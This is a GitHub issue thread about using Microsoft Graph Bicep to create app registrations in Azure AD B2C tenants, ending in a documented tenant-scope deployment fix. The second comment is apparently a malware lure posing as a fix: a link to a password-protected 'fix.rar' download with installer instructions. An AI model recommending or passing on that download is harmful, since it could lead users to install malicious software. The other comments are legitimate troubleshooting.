### ISSUE TITLE
B2C Tenant Support Microsoft Graph Bicep

### ISSUE THREAD

**Issue by Anttarax** [microsoftgraph/msgraph-bicep-types#166]
Microsoft Graph Bicep Deploy requires an existing Azure Subscription, however, the Azure B2C Entra ID cannot have a subscription.
So it is not possible to use Microsoft Graph Bicep for Azure B2C Entra ID. We cannot do App registrations, which is very sad.

**Comment by Fariz86** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by barbara-goeller** [comment]
I have the same problem, that I can't make it work to deploy an app registration with the MicrosoftGraph-Provider using Bicep.
Also the documentation is not clear about that:

- In the [closed issue](https://github.com/Azure/bicep/issues/7724) is is stated that the MicrosoftGraph-Provider works also for app registrations in B2C tenants.
- The [quickstart templates](https://github.com/microsoftgraph/msgraph-bicep-types/blob/main/quickstart-templates/application-serviceprincipal-create-client-resource/main.bicep) referenced from the official [docu](https://learn.microsoft.com/en-us/graph/templates/reference/applications?view=graph-bicep-1.0) states one should just use `az deployment group create --resource-group <resource-group> --template-file main.bicep` but in an AAD B2C tenant I do not have any resource group so this does not work.

What I also tried is to use `az deployment tenant create --template-file .\aadB2C-setup.bicep --location WestEU` instead to do a deployment on tenant level but this gives me the following error:
![image](https://github.com/user-attachments/assets/c9772f12-905a-45c4-a322-08ca8da8eab4)

Can you please clarify how we can make it work?

**Comment by dkershaw10** [comment]
Sorry for the late response, @Anttarax and @barbara-goeller 
Unfortunately B2C tenants do not allow Azure subscriptions - which also means that folks won't be able to use Bicep to deploy any Entra resources, as you've already discovered, because the ARM deployment engine requires a Azure subscription.  This is a known issue, that somehow has actually evaded our [known issues topic](https://learn.microsoft.com/graph/templates/known-issues-graph-bicep?view=graph-bicep-1.0) - maybe because our quickstarts make it very clear that an Azure subscription is a pre-requisite.  That said, I think we should revisit this, and make it clear in the known issues and explicitly mention B2C tenants.

Calling this out as an issue however is one thing - it doesn't really solve your problem.
I've had some internal discussions with the Bicep team about removing the requirement for an Azure subscription when deploying non-Azure resources. Unfortunately I don't have much to share at this time. but will report back when I have an update.

cc: @anthony-c-martin

**Comment by Anttarax** [comment]
Applications & Groups should be on Tenant level, not Subscription level. Wrong Targetscope…

**Comment by dkershaw10** [comment]
@Anttarax @barbara-goeller I think we might have a workaround here that you can try. Can you please verify this in your B2C/Enternal tenants?

Follow the steps in https://learn.microsoft.com/azure/azure-resource-manager/bicep/deploy-to-tenant?tabs=azure-cli (skipping the "supported resources" section, as that is not relevant).  In summary:
1. Add `targetScope = 'tenant'` to your Bicep file (containing Graph/Entra resources).
2. Assign the requisite permissions to the security principal performing the deployment.  This needs to be done by a global admin elevated to a Azure admin:
   -  Elevate account access so the Global Administrator can assign roles. For more information, see [Elevate access to manage all Azure subscriptions and management groups](https://learn.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin).
   - Assign Owner or Contributor to the principal that needs to deploy the templates.
     `az role assignment create --assignee "[principalId]" --scope "/" --role "Owner"` 
3. Perform a tenant deployment using the permission security principal, using [az deployment tenant create](https://learn.microsoft.com/en-us/cli/azure/deployment/tenant#az-deployment-tenant-create).

LMK if this works - I plan to create a How-to topic for this.

**Comment by barbara-goeller** [comment]
Hey @dkershaw10 ,
Thanks for giving that workaround. I just tried it in one B2C tenant and it works fine.
It would be really nice to have a How-to-topic for this as you suggested.

**Comment by dkershaw10** [comment]
@barbara-goeller Perfect - thanks for your help confirming the workaround.  I already have the how-to drafted.  I just needed confirmation before getting this published.  It should be published within the week.  I will update this issue when the topic is published.

**Comment by dkershaw10** [comment]
@barbara-goeller and @Anttarax - this is now publicly documented here: https://learn.microsoft.com/graph/templates/how-to-deploy-without-azure-sub?view=graph-bicep-1.0&tabs=CLI (based on the merged PR linked above).

**Comment by dkershaw10** [comment]
@barbara-goeller @Anttarax - closing this issue.  Please reopen if you believe that how-to document doesn't meet your needs.
